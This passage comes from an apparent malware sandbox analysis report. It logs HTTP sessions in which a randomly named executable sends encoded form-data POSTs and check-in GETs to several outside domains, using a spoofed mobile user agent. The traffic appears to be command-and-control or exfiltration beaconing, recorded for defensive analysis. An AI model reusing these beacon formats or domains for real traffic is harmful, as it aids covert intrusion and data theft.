                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 51 5a 6f 6c 4e 77 4c 4f 61 2b 75 72 43 7a 4f 38 6a 70 65 37 6a 78 78 30 69 34 66 6e 75 43 53 76 56 73 75 48 56 49 3d
                                                  Data Ascii: prutfR_P=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uQZolNwLOa+urCzO8jpe7jxx0i4fnuCSvVsuHVI=
                                                  Sep 16, 2024 09:38:24.846539974 CEST368INHTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Mon, 16 Sep 2024 07:38:24 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.masteriocp.online/p5rq/
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.54971413.228.81.39802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:38:26.469443083 CEST817OUTPOST /p5rq/ HTTP/1.1
                                                  Host: www.masteriocp.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.masteriocp.online
                                                  Referer: http://www.masteriocp.online/p5rq/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 6c 33 76 61 38 74 69 75 75 61 74 68 4a 79 67 67 52 48 76 72 4a 6f 7a 47 6d 45 4d 50 57 55 54 66 4e 6e 78 59 61 2f 64 70 63 35 55 57 30 59 51 53 46 35 4c 76 64 2b 76 38 4e 6b 6d 48 49 33 4f 45 6c 32 48 36 75 54 75 5a 64 71 75 46 53 6e 6d 6c 46 56 2f 4a 2b 61 73 5a 71 64 54 74 49 6b 66 76 5a 38 61 34 47 6e 2f 71 47 42 62 38 73 50 33 4d 31 48 4f 6c 32 67 32 78 56 2b 34 76 70 63 5a 39 61 58 6a 55 65 6b 6d 42 68 32 6f 44 64 4a 6b 78 77 6f 32 65 6a 37 31 32 38 65 5a 43 65 5a 31 4b 36 79 34 35 71 59 75 64 30 73 54 77 49 76 39 35 6f 4e
                                                  Data Ascii: prutfR_P=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHl3va8tiuuathJyggRHvrJozGmEMPWUTfNnxYa/dpc5UW0YQSF5Lvd+v8NkmHI3OEl2H6uTuZdquFSnmlFV/J+asZqdTtIkfvZ8a4Gn/qGBb8sP3M1HOl2g2xV+4vpcZ9aXjUekmBh2oDdJkxwo2ej7128eZCeZ1K6y45qYud0sTwIv95oN
                                                  Sep 16, 2024 09:38:27.367500067 CEST368INHTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Mon, 16 Sep 2024 07:38:27 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.masteriocp.online/p5rq/
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.54971513.228.81.39802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:38:29.012908936 CEST1834OUTPOST /p5rq/ HTTP/1.1
                                                  Host: www.masteriocp.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.masteriocp.online
                                                  Referer: http://www.masteriocp.online/p5rq/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 74 33 76 73 6f 74 77 5a 61 61 2f 78 4a 79 74 41 52 43 76 72 49 36 7a 48 4f 36 4d 50 4c 6a 54 63 31 6e 7a 36 69 2f 59 63 6f 35 44 47 30 59 50 43 46 34 45 50 64 72 76 39 68 37 6d 48 59 33 4f 45 6c 32 48 37 65 54 6e 74 42 71 69 6c 53 6b 79 31 46 6a 37 4a 2b 79 73 5a 7a 6f 54 74 45 30 66 38 52 38 61 59 57 6e 39 59 2b 42 58 38 73 33 77 4d 30 43 4f 6c 36 46 32 78 4a 79 34 75 4e 36 5a 37 71 58 31 77 7a 74 69 69 4a 68 2f 69 6c 6f 70 51 6b 61 6d 49 6a 56 79 30 38 51 44 51 4b 44 35 4f 79 75 37 38 2b 59 74 4f 42 59 4e 48 77 33 30 65 41 41 72 74 38 51 35 58 66 2b 7a 47 31 6e 77 48 5a 43 62 52 63 34 32 35 52 41 71 62 59 74 56 36 69 63 7a 6b 68 32 4c 4f 56 6a 75 62 66 37 69 31 43 38 46 4d 52 34 66 48 32 56 58 44 79 33 35 70 43 42 2b 4d 61 68 5a 75 78 4b 6c 49 43 6d 58 63 66 6c 44 30 43 37 78 47 34 37 53 62 38 42 61 78 35 45 50 67 39 55 39 43 6f 63 67 53 6f 33 73 [TRUNCATED]
                                                  Data Ascii: prutfR_P=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHt3vsotwZaa/xJytARCvrI6zHO6MPLjTc1nz6i/Yco5DG0YPCF4EPdrv9h7mHY3OEl2H7eTntBqilSky1Fj7J+ysZzoTtE0f8R8aYWn9Y+BX8s3wM0COl6F2xJy4uN6Z7qX1wztiiJh/ilopQkamIjVy08QDQKD5Oyu78+YtOBYNHw30eAArt8Q5Xf+zG1nwHZCbRc425RAqbYtV6iczkh2LOVjubf7i1C8FMR4fH2VXDy35pCB+MahZuxKlICmXcflD0C7xG47Sb8Bax5EPg9U9CocgSo3suyL0x9LBixVrcKhDygvCaenDMA9KMeJ5BcwQUfYZyvLt024o0t3a6gcAa9obooCynLLZnYwgkjSxk1l5Up0KBcNwCpzb5dxtdauGLjUMpOEfzgN3B7H/CWc+BmL6DHXCr70hNo6j8v1pKHiVWgC+0H5G9fHGDmZi4p3LNws+3wyvm+LfgBJwD2w0Vq3sexyQhKYTiYG6e0rf0TZEqlxPawJCav4pVUMQMT3dFDq69YAIzbzpW9tBnt1/JKC/1ulRII0flukmgOoA4R/MOcaCXHTpMLibcroZP+VJK+CbQiKzSm8RL3bMsHXokrOuKJx7mkYeKMqaPZWk82uTcj6XpiAoiSG6bLG8ifX7odk0ymwIZFQw8/LxI0zd6ZeWji6T58XsFSY/WHKiCDeuetJDKxlKcnA8+RsrI7zNjjxX9WyVtPTDtRyHWr6Jc6a1528gcN9nwalqd+fTSIeJkT9eRDutaOGvz8n/Mn20pOrGOghVYkrkLd+v5DkZGcwoeNc3kXUSBjfT26azI8Z83gTRBIe/WLGBZb3Ru5UGecQmNPsoSvRWSRejRX5V6dboAxEFMzDpf0419I0fldvGz1JzMQ7CmYCEEzC8X5/g5gbAWr6G57r5iAVO1jRGtcsHvJ/8QHQ/2I2rRUptp5t1LxWf06JSbB4j+4rQvQ [TRUNCATED]
                                                  Sep 16, 2024 09:38:29.944726944 CEST368INHTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Mon, 16 Sep 2024 07:38:29 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.masteriocp.online/p5rq/
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.54971613.228.81.39802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:38:31.559880018 CEST529OUTGET /p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.masteriocp.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:38:32.474405050 CEST524INHTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Mon, 16 Sep 2024 07:38:32 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux6
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.54971766.81.203.200802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:38:37.754627943 CEST785OUTPOST /osde/ HTTP/1.1
                                                  Host: www.mediaplug.biz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.mediaplug.biz
                                                  Referer: http://www.mediaplug.biz/osde/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 73 72 49 58 4a 63 53 63 6b 68 56 48 75 4f 74 6e 34 44 77 38 33 36 4f 79 4a 38 70 5a 6e 39 65 57 7a 70 54 2f 65 35 41 39 78 6e 46 30 50 56 66 56 51 47 62 39 45 45 6c 49 50 66 6c 5a 5a 48 68 63 7a 34 4c 4c 35 63 70 62 49 47 47 63 45 69 6a 37 6b 41 46 46 52 49 55 32 76 43 33 48 77 6b 42 43 6d 38 72 6d 34 48 76 47 37 4e 2f 51 30 61 4d 68 67 38 62 30 72 6b 58 63 66 41 43 41 78 6c 61 4d 72 32 64 63 7a 54 5a 4b 37 72 46 47 64 6c 38 4f 51 35 66 6a 4f 6b 62 62 76 5a 44 37 4a 30 4a 6d 45 4b 54 59 66 61 58 44 50 66 62 36 66 6c 58 36 59 67 70 61 4e 76 75 76 41 63 67 3d
                                                  Data Ascii: prutfR_P=cUZt2z1pvMaysrIXJcSckhVHuOtn4Dw836OyJ8pZn9eWzpT/e5A9xnF0PVfVQGb9EElIPflZZHhcz4LL5cpbIGGcEij7kAFFRIU2vC3HwkBCm8rm4HvG7N/Q0aMhg8b0rkXcfACAxlaMr2dczTZK7rFGdl8OQ5fjOkbbvZD7J0JmEKTYfaXDPfb6flX6YgpaNvuvAcg=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.54971866.81.203.200802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:38:40.295301914 CEST805OUTPOST /osde/ HTTP/1.1
                                                  Host: www.mediaplug.biz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.mediaplug.biz
                                                  Referer: http://www.mediaplug.biz/osde/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 32 57 7a 4d 76 2f 4d 6f 41 39 79 6e 46 30 58 6c 66 55 50 57 62 32 45 45 6f 31 50 65 5a 5a 5a 48 64 63 7a 38 50 4c 34 76 42 45 49 57 47 53 49 43 6a 35 71 67 46 46 52 49 55 32 76 42 4b 69 77 6b 5a 43 6d 76 7a 6d 71 54 37 42 6c 64 2f 52 38 36 4d 68 6b 38 62 4b 72 6b 57 78 66 43 32 2b 78 6e 79 4d 72 79 52 63 77 43 5a 4a 67 37 46 49 54 46 38 51 63 38 36 63 57 46 7a 42 6b 4b 6d 45 65 6d 63 63 4d 63 2b 79 46 34 66 72 63 2f 33 43 50 32 66 4e 4a 51 49 7a 58 4d 2b 66 65 4c 31 4a 6f 4e 66 41 6e 61 65 70 49 65 75 78 64 66 46 65 51 53 71 57
                                                  Data Ascii: prutfR_P=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL2WzMv/MoA9ynF0XlfUPWb2EEo1PeZZZHdcz8PL4vBEIWGSICj5qgFFRIU2vBKiwkZCmvzmqT7Bld/R86Mhk8bKrkWxfC2+xnyMryRcwCZJg7FITF8Qc86cWFzBkKmEemccMc+yF4frc/3CP2fNJQIzXM+feL1JoNfAnaepIeuxdfFeQSqW


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.54971966.81.203.200802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:38:42.844691992 CEST1822OUTPOST /osde/ HTTP/1.1
                                                  Host: www.mediaplug.biz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.mediaplug.biz
                                                  Referer: http://www.mediaplug.biz/osde/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 2b 57 7a 36 37 2f 65 66 38 39 7a 6e 46 30 61 46 66 4a 50 57 62 72 45 48 59 78 50 65 55 73 5a 42 5a 63 68 4a 62 4c 78 2b 42 45 47 57 47 53 47 53 6a 34 6b 41 46 71 52 49 45 79 76 43 79 69 77 6b 5a 43 6d 74 48 6d 36 33 76 42 6e 64 2f 51 30 61 4d 74 67 38 61 6e 72 6b 4f 50 66 43 6a 4c 77 58 53 4d 71 57 39 63 32 77 78 4a 73 37 46 64 55 46 39 44 63 38 2b 39 57 46 2f 4e 6b 4c 53 2b 65 6b 4d 63 63 61 48 4e 42 4c 50 6e 4b 75 48 42 4a 56 72 2b 51 56 34 71 4a 75 43 51 62 4a 39 49 33 70 57 6f 6c 74 43 72 42 4f 62 76 4c 5a 6c 50 51 58 4c 32 56 63 5a 6b 4a 4c 61 59 64 34 32 39 65 44 7a 79 74 44 77 34 67 39 34 73 66 70 48 36 64 63 77 39 36 53 5a 74 37 55 71 4c 48 49 2b 43 57 6c 67 58 33 45 4b 50 5a 72 76 67 43 76 32 39 50 54 4a 72 4c 57 58 4d 66 46 38 2b 66 65 50 51 48 6b 50 6e 6c 49 49 38 72 69 72 44 41 54 4e 66 30 4b 57 45 49 6d 39 6a 4d 4d 43 54 61 56 5a 39 66 [TRUNCATED]
                                                  Data Ascii: prutfR_P=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL+Wz67/ef89znF0aFfJPWbrEHYxPeUsZBZchJbLx+BEGWGSGSj4kAFqRIEyvCyiwkZCmtHm63vBnd/Q0aMtg8anrkOPfCjLwXSMqW9c2wxJs7FdUF9Dc8+9WF/NkLS+ekMccaHNBLPnKuHBJVr+QV4qJuCQbJ9I3pWoltCrBObvLZlPQXL2VcZkJLaYd429eDzytDw4g94sfpH6dcw96SZt7UqLHI+CWlgX3EKPZrvgCv29PTJrLWXMfF8+fePQHkPnlII8rirDATNf0KWEIm9jMMCTaVZ9ftxSLcr/PA+SyNPMdxXcyOWIWkl0LMTywG70qE4p8S297URBHk7zAb0IuDuDHGknf2yMyxc8ycB09e9PMAmWAwFiBiFMJ8w3DaRE7uiYeR4MwQGRD86b8qGEzh7EYe7/f6WwHbJCnTHTKZ7nHx+l/EIJUrnPI08IFeXyYW4/XGuJyneqvu4bebEAb/v1r+dCg0v347sW6PLYFr5F6D75Ms693lfXxjMv//ZlNocxCy7PZcF/coXiinxjUjc1UOOJQveYQP78Pab7fKLy+/QBlJsDPxMv5RK0x8fgiy6OPKjIb8YHz0J1irJXqgtl+LfGTCc2e76iqb8xODxtyCp3jKpbLHmuzpYDR52k71fjqkQQSmiU0RnWzVkKvtpzdPIze4JxdypMOVbva/CqQoadE/L11GTPOd+TJlVoaWkR5WhzbRssqYq3akqXDqONbZ/6TD0NUM8fOi/itOqY0TJluL5kRsP5lPaJDnuSPY/XM7kvHBcn0dDcyHg8UtfwC7eLhLPdRpPXa7gfhix58tWC/FClmnwG8FYEdPkjINmoaFneCRyryQa8DqhkBJzw3uKtIYMGAxlpwnQPbn0e8xw+D3Ci/dn9/q1p/UEc3ZozvMhDmoVMyGiVSNpL933P+uObzvk2ehPOmqphPyjGy9zuNyT61+5FgheLqgD [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.54972066.81.203.200802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:38:45.387876987 CEST525OUTGET /osde/?prutfR_P=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.mediaplug.biz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.549721103.42.108.46802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:12.218713045 CEST800OUTPOST /yl6y/ HTTP/1.1
                                                  Host: www.independent200.org
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.independent200.org
                                                  Referer: http://www.independent200.org/yl6y/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 34 2b 61 4e 46 42 6d 66 4b 2f 77 73 66 62 72 45 4d 38 41 4a 76 30 70 39 6b 2b 66 65 38 64 6e 33 5a 4e 37 68 54 64 52 43 61 73 31 33 57 4f 43 42 61 42 54 45 64 66 4d 44 65 59 41 4e 48 6e 56 39 76 6f 76 30 4a 70 42 4f 41 79 56 56 54 50 54 38 48 69 55 75 65 56 39 6f 56 32 44 50 51 50 6b 73 70 2b 30 47 44 72 66 63 61 54 56 4b 45 79 58 58 51 56 43 6b 67 77 71 6f 61 66 78 4e 6f 52 78 4c 57 54 6f 61 78 75 63 56 74 41 49 43 63 70 57 68 42 41 69 35 59 71 34 53 38 2b 41 64 78 55 6a 2f 41 53 2b 76 62 69 32 6d 50 78 53 34 6a 4b 64 34 47 48 54 55 36 32 75 6e 66 34 34 3d
                                                  Data Ascii: prutfR_P=dNiLasFHVsc44+aNFBmfK/wsfbrEM8AJv0p9k+fe8dn3ZN7hTdRCas13WOCBaBTEdfMDeYANHnV9vov0JpBOAyVVTPT8HiUueV9oV2DPQPksp+0GDrfcaTVKEyXXQVCkgwqoafxNoRxLWToaxucVtAICcpWhBAi5Yq4S8+AdxUj/AS+vbi2mPxS4jKd4GHTU62unf44=
                                                  Sep 16, 2024 09:39:13.080423117 CEST154INHTTP/1.1 403 Forbidden
                                                  Content-Type: text/plain; charset=utf-8
                                                  Date: Mon, 16 Sep 2024 07:39:12 GMT
                                                  Content-Length: 11
                                                  Connection: close
                                                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                  Data Ascii: Bad Request


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.549722103.42.108.46802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:14.769258976 CEST820OUTPOST /yl6y/ HTTP/1.1
                                                  Host: www.independent200.org
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.independent200.org
                                                  Referer: http://www.independent200.org/yl6y/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
